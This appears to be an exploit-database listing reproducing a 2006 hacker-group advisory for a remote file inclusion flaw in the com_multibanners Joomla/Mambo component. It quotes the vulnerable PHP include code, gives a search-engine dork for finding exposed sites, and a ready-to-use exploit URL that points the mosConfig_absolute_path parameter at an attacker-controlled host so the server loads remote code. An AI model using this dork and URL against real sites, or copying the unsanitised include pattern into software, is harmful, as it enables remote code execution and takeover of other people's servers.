Com Multibanners Remote File Inclusion (mosConfig_absolute_path)
CVE
Category
Price
Severity
N/A
CWE-98
Not specified
Medium
Author
Risk
Exploitation Type
Date
Not specified
Medium
Remote
2006-08-02
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006070114 #############################SolpotCrew Community################################
#
# Com Multibanners Remote File Inclusion (mosConfig_absolute_path)
#
# original advisory : http://solpotcrew.org/adv/BlueSpy-adv-multibanners.txt
#
########################################################################
#########
#
#
# Bug Found By :Blue|Spy
#
# contact: mail (at) blue-spy (dot) net [email concealed]
#
# Website : http://kunamgede.biz, http://blue-spy.net
#
########################################################################
########
#
#
# Greetz: h4ntu , Fungky, Solpot, Matdhule
# and all crew #mardongan @ irc.dal.net
#
#
########################################################################
#######
code from extadminmenus.class.php
if (phpversion() < '4.2.0') {
require_once( $mosConfig_absolute_path . '/includes/compat.php41x.php' );
}
if (phpversion() < '4.3.0') {
require_once( $mosConfig_absolute_path . '/includes/compat.php42x.php' );
}
Dork:
inurl:com_multibanners
exploit:
http://site.com/[path]//administrator/components/com_multibanners/extadm
inmenus.class.php?mosConfig_absolute_path=[attacker]
##############################MY LOVE JUST FOR U LIENA#########################
########################################################################
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only.Terms of Use and Privacy Policy and Impressum